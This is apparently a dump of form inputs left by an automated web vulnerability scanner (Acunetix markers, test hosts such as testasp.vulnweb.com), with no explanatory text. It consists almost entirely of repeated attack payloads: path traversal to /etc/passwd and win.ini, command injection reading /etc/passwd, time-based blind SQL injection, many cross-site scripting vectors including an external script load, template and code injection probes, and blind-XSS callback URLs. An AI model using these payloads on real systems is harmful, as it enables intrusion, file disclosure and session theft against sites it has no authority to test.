
1&n911390=v936961

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

tcD9rxi8'

'|'ld

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(982460) //>

'"()

1

testasp.vulnweb.com

'

g7p9Dpqo')

1

"|"ld

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(956137)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"

1

l6kHSqCs'))

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

acunetix_wvs_invalid_filename

1_r0a8s <ScRiPt >prompt(916280)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1))

http://hitlleSruisoe.bxss.me/

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

hHXodHCt'

1

||cat /etc/passwd

1

comments/.

1

IgZneFU4')

1

1

................etc/passwd

1

&dir

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(967780)</ScRiPt>

'"

1

zPDam7gK'))

1

1

'&dir&'

1

'"()&%<ScRiPt >prompt(987404)</ScRiPt>

<!--

1

1

1

file:///etc/passwd

1

1

1

1

1_901412

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

1

1

WEB-INF/web.xml

1

1

'|dir

WEB-INF\web.xml

acu1009<s1﹥s2ʺs3ʹuca1009

"|dir

1

1

../../../../../../../../../../windows/win.ini

acux8375z1z2abcxuca8375

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(998333)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(919271)</script>

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(964167)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910869></ScRiPt>

1

................windowswin.ini

1

1<ScRiPt >prompt(939802)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<video><source onerror="javascript:prompt(925153)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995734)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9304944*9000196)

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(962807))>

'+response.write(9304944*9000196)+'

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<iframe src='data:text/html

"+response.write(9304944*9000196)+"

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(909273)>

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982449)>

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img src=xyz OnErRor=prompt(922672)>

1

1

1<img/src=">" onerror=alert(945815)>

${99959+100153}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1&n969500=v953672

1<ScRiPt%20>prompt(913472)</sCripT>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1&lt

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

<img acu onmouseover=prompt(945609) //>

testasp.vulnweb.com

!(()&&!|*|*|

'"()

1

Jdlxt8N3'

1<input autofocus onfocus=prompt(963264)>

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

1

^(#$!@#$)(()))******

1

xgkYFrKB')

1

'

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

"

1

1

1

6gOFrr9l'))

[url=http://www.acunetix.com]website security[/url]

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

1_lWYBO <ScRiPt >prompt(900087)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

http://hitKz9KOzVsog.bxss.me/

1

&dir

1

1

1

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

-1))

1

1

'&dir&'

1

1

comments

1

EVE2CBEt'

1'"()&%<ScRiPt >prompt(947146)</ScRiPt>

1

"&dir&"

http://www.acunetix.tst

'"

1

1

file:///etc/passwd

comments

'"()&%<ScRiPt >prompt(925801)</ScRiPt>

j7THQSCP')

1

|dir

1

1

<!--

comments/.

1_913059

B9wYcU4z'))

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

WEB-INF/web.xml

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

../../../../../../../../../../boot.ini

1

1

1

1

acu10200<s1﹥s2ʺs3ʹuca10200

1

../../../../../../../../../../windows/win.ini.jpg

acux1450z1z2abcxuca1450

1

windowswin.ini

1<ScRiPt >prompt(942382)</ScRiPt>

1

1

1

1<script>prompt(961888)</script>

................windowswin.ini

1

1<ScRiPt >prompt(984780)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972890></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(900587)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(956880)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934024)"></g></svg>

response.write(9003574*9093740)

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(999885))>

1

'+response.write(9003574*9093740)+'

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

1

"+response.write(9003574*9093740)+"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<body onload=prompt(975148)>

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999667)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

1<img src=xyz OnErRor=prompt(914448)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1<img/src=">" onerror=alert(973310)>

1

1

${99066+99498}

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1

1<ScRiPt%20>prompt(998635)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n907333=v973983

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

JEaabXEx'

)

1

<img acu onmouseover=prompt(953460) //>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

testasp.vulnweb.com

6GSTLkXt')

!(()&&!|*|*|

1<input autofocus onfocus=prompt(933511)>

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

'"()

^(#$!@#$)(()))******

1

AFkP9Zzw'))

<a href='http://www.acunetix.com'>website security</a>

'

/etc/passwd

1

1

'

1

1

"

-1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1_bxBKG <ScRiPt >prompt(974756)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

acunetix_wvs_invalid_filename

http://hitSKtTHBws0K.bxss.me/

1

||cat /etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

................etc/passwd

K5sIOTpa'

comments

&dir

1

1

1

1

wbTZNz6H')

comments

1

http://www.acunetix.tst

'"

1'"()&%<ScRiPt >prompt(929581)</ScRiPt>

1

'&dir&'

1

file:///etc/passwd

comments/.

bXoMCxHk'))

<!--

'"()&%<ScRiPt >prompt(909906)</ScRiPt>

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_921757

1

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

"|dir

acu6096<s1﹥s2ʺs3ʹuca6096

../../../../../../../../../../windows/win.ini

1

1

acux7879z1z2abcxuca7879

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(946619)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(921194)</script>

1

1

windowswin.ini

1

1<ScRiPt >prompt(955694)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977277></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(988805)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(930330)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9303945*9374299)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920884)"></g></svg>

1

'+response.write(9303945*9374299)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(976408))>

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

"+response.write(9303945*9374299)+"

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(959891)>

'&cat /etc/passwd&'

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911270)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

1

1

1<img src=xyz OnErRor=prompt(960813)>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99701+99772}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img/src=">" onerror=alert(915889)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1&n901182=v902292

1some_inexistent_file_with_long_name%00.jpg

-1

1

1<ScRiPt%20>prompt(998997)</sCripT>

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1&lt

testasp.vulnweb.com

!(()&&!|*|*|

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

'"()

-1))

'

1

^(#$!@#$)(()))******

<img acu onmouseover=prompt(992645) //>

1

1

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

FRGYP3aE'

1

1

1<input autofocus onfocus=prompt(970865)>

1

1

mgSw3Y1m')

${@print(md5(acunetix_wvs_security_test))}

1

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

jBRHz6zd'))

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

1

http://hitZeRPLTgsmd.bxss.me/

-1

1

"

1

1

comments

1_YzzeA <ScRiPt >prompt(921061)</ScRiPt>

||cat /etc/passwd

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

comments

1

-1))

&dir

1

................etc/passwd

'"

http://www.acunetix.tst

1

1

comments/.

1

Wns65xBY'

'&dir&'

1'"()&%<ScRiPt >prompt(944738)</ScRiPt>

<!--

1

1

1

OL8adSUe')

1

1

1

1

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(994461)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

nFoGy22I'))

1

1

1

1

1_934239

1

WEB-INF/web.xml

|dir

1

1

'|dir

1

WEB-INF\web.xml

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu8854<s1﹥s2ʺs3ʹuca8854

1

../../../../../../../../../../windows/win.ini.jpg

1

acux6273z1z2abcxuca6273

1

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(985624)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(921621)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(944534)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

response.write(9646792*9804010)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975739></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9646792*9804010)+'

1<ScRiPt >prompt(952662)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(966381)">

1

1

"+response.write(9646792*9804010)+"

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983177)"></g></svg>

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1<div style=width:expression(prompt(975977))>

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(931011)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1

1

1

${99262+99341}

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990434)>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

1

1<img src=xyz OnErRor=prompt(972155)>

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n927363=v936026

1<img/src=">" onerror=alert(994654)>

1

1

-1))

)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

"|"ld

1<ScRiPt%20>prompt(948492)</sCripT>

1

1

GWmwPM3P'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

'"()

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

5ASarY5H')

1

testasp.vulnweb.com

1

'

1

1

/etc/passwd

<img acu onmouseover=prompt(956031) //>

htpVX4kI'))

'

1

1

1

"

1

1

1<input autofocus onfocus=prompt(980033)>

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitpTWU9KrNnt.bxss.me/

[url=http://www.acunetix.com]website security[/url]

&dir

................etc/passwd

1

-1))

1

1

acunetix_wvs_invalid_filename

1

'&dir&'

1

1_VzCZa <ScRiPt >prompt(919124)</ScRiPt>

TIgdGdHC'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

"&dir&"

lXYy8I9x')

http://www.acunetix.tst

1

comments

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(985195)</ScRiPt>

|dir

gVTk5VDJ'))

<!--

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

'"()&%<ScRiPt >prompt(934519)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

1

1_944201

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu1840<s1﹥s2ʺs3ʹuca1840

1

../../../../../../../../../../boot.ini

1

1

acux7540z1z2abcxuca7540

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(944315)</ScRiPt>

1

windowswin.ini

1

1

1

................windowswin.ini

1<script>prompt(965472)</script>

1

1

1

1<ScRiPt >prompt(972059)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963881></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(970910)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(907933)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988806)"></g></svg>

1

response.write(9012202*9668361)

WEB-INF/web.xml

1

1<div style=width:expression(prompt(911858))>

1

WEB-INF\web.xml

'+response.write(9012202*9668361)+'

1

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9012202*9668361)+"

&cat /etc/passwd&

1<body onload=prompt(974965)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987270)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(979952)>

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9.891),0)/*'XOR(if(now()=sysdate(),sleep(9.891),0))OR'"XOR(if(now()=sysdate(),sleep(9.891),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(964974)>

cat /etc/passwd

1

1

(select(0)from(select(sleep(9.891)))v)/*'+(select(0)from(select(sleep(9.891)))v)+'"+(select(0)from(select(sleep(9.891)))v)+"*/

${99031+99008}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(963005)</sCripT>

1

-1

1&n907476=v959549

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

)

|cat /etc/passwd#

1&lt

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1))

1

<img acu onmouseover=prompt(983115) //>

'|'ld

1

1

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(964157)>

zmGxQ2UF'

1

"|"ld

1

/etc/passwd

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

SVJVVXdB')

1

1

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

C4C4mBst'))

1

acunetix_wvs_invalid_filename

1_wnerS <ScRiPt >prompt(947908)</ScRiPt>

http://hitmvjOiwJIAD.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1)

||cat /etc/passwd

................etc/passwd

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

&dir

-1))

1

comments/.

1

1

1

'"

file:///etc/passwd

1

DhkW0dk0'

'&dir&'

1

1'"()&%<ScRiPt >prompt(990764)</ScRiPt>

<!--

81ApmsLH')

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

1

1

WEB-INF/web.xml

4mh7kf5U'))

'"()&%<ScRiPt >prompt(992733)</ScRiPt>

1

1

1

|dir

1

1

1_921159

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu2016<s1﹥s2ʺs3ʹuca2016

1

1

acux4199z1z2abcxuca4199

1

1

windowswin.ini

1<ScRiPt >prompt(973549)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(930005)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(968755)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

response.write(9646652*9899474)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902475></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9646652*9899474)+'

1

&cat /etc/passwd&

1

1<ScRiPt >prompt(922567)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9646652*9899474)+"

1

1<video><source onerror="javascript:prompt(946107)">

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906325)"></g></svg>

1

1

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(974182))>

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

${99497+100062}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(957335)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948101)>

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n901063=v947404

)

1

-1)

'|'ld

1

1

1<img src=xyz OnErRor=prompt(993095)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

!(()&&!|*|*|

1

1

"|"ld

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(921547)>

'"()

dKFs1Ieg'

^(#$!@#$)(()))******

1

1

1

1<ScRiPt%20>prompt(956629)</sCripT>

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

jjeFOdPD')

1

1&lt

1

1

1

'

"

1

/etc/passwd

Aut6uLbV'))

<img acu onmouseover=prompt(953015) //>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(929432)>

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

-1)

http://hitIVaA5c630w.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

acunetix_wvs_invalid_filename

1

1

-1))

1

&dir

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

FqVDQtSe'

comments

http://www.acunetix.tst

1_WWxVg <ScRiPt >prompt(945878)</ScRiPt>

'&dir&'

1

1

'"

AuKLCks6')

comments/.

1

file:///etc/passwd

"&dir&"

1

1

<!--

1

cBaSiPlB'))

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1'"()&%<ScRiPt >prompt(944474)</ScRiPt>

1

WEB-INF/web.xml

'|dir

1

1

1

1

1

'"()&%<ScRiPt >prompt(949695)</ScRiPt>

WEB-INF\web.xml

"|dir

1

1

1

1

1_944943

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu1549<s1﹥s2ʺs3ʹuca1549

1

1

1

windowswin.ini

acux4768z1z2abcxuca4768

1

1

1

1

1<ScRiPt >prompt(919638)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(971435)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(920801)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902356></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(907297)</ScRiPt>

1

1

response.write(9532303*9372080)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(945262)">

1

'+response.write(9532303*9372080)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984604)"></g></svg>

&cat /etc/passwd&

1

1

1

"+response.write(9532303*9372080)+"

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(985504))>

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

